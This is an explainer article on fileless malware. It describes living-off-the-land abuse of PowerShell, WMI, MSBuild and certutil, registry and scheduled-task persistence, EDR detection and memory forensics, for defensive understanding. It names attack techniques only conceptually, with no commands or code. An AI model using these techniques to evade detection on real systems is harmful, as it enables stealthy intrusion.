Fileless Malware - Attacks That Leave No Files
About 2 min read
Fileless malware is a collective term for malware that executes directly in memory without writing any files to disk. Traditional antivirus software detects threats by scanning files for signatures (patterns), but because fileless malware leaves no file to scan, it slips past this detection technique. It surged around 2017, and today many advanced targeted attacks incorporate fileless techniques.
The Living off the Land (LOL) Technique
At the heart of fileless malware lies a technique called "Living off the Land." Because it abuses legitimate tools built into the OS, security products find it hard to distinguish between "normal administrative operations" and "attacks."
Executes scripts in memory. Obfuscates commands with Base64 encoding and downloads and runs payloads from a C2 server
Uses Windows Management Instrumentation to launch processes remotely and achieve persistence through event subscriptions
Abuses the inline task feature of .NET to compile and run C# code embedded inside an XML file
Abused to execute HTA files and to reconstruct payloads using certutil's Base64 decoding feature
The LOLBAS (Living Off The Land Binaries, Scripts and Libraries) project systematically catalogs standard Windows binaries that could be abused in attacks. Security teams reference this list to prioritize which processes to monitor.
Why Traditional Antivirus Cannot Detect It
File scanning
No file exists
Behavior monitoring
Detects abnormal API calls
Traditional antivirus works by matching files on disk against a signature database. Because fileless malware operates only in memory, there is nothing to scan. Furthermore, PowerShell and WMI are legitimate OS components, and blocking those processes outright would disrupt business operations. This "abuse of legitimate tools" is the fundamental reason fileless malware is so difficult to detect.
Behavior-Based Detection with EDR
EDR (Endpoint Detection and Response) monitors process behavior rather than the presence of files. It detects abnormal patterns such as PowerShell executing a Base64-encoded command, a suspicious process launching via WMI, or a process that normally never communicates connecting to an external IP, and it raises alerts. By combining machine-learning-based behavioral analysis, it can also handle unknown fileless attacks.
Hiding in the Registry and Scheduled Tasks
Although fileless malware "writes no files," it may still possess persistence mechanisms to survive reboots. Representative techniques include writing an encoded PowerShell command into the Run key of the Windows registry, or registering a malicious script as a scheduled task. Using WMI event subscriptions, code can be executed in memory triggered by specific conditions (logon, time, and so on). Advanced techniques that conceal these persistence entries themselves by combining with a rootkit have also been confirmed.
The Importance of Memory Forensics
In investigating fileless malware, memory forensics is decisively important within digital forensics. Because no traces remain on disk, you cannot grasp the full scope of an attack unless you capture and analyze a dump of the RAM. Using tools such as the Volatility Framework, you identify suspicious processes in memory, injected code, and network connection destinations.
Rebooting a device when an incident occurs erases all the evidence in memory. It is essential to firmly establish the procedure of "first capture a memory dump, then respond" as the initial step of incident response. Traces of lateral movement often remain only in memory as well, so from the standpoint of ransomware protection, building out a memory forensics capability is also required.
Browser extension security also warrants attention as an attack vector related to fileless techniques. malware analysis books on Amazon can also be found there.
Was this article helpful?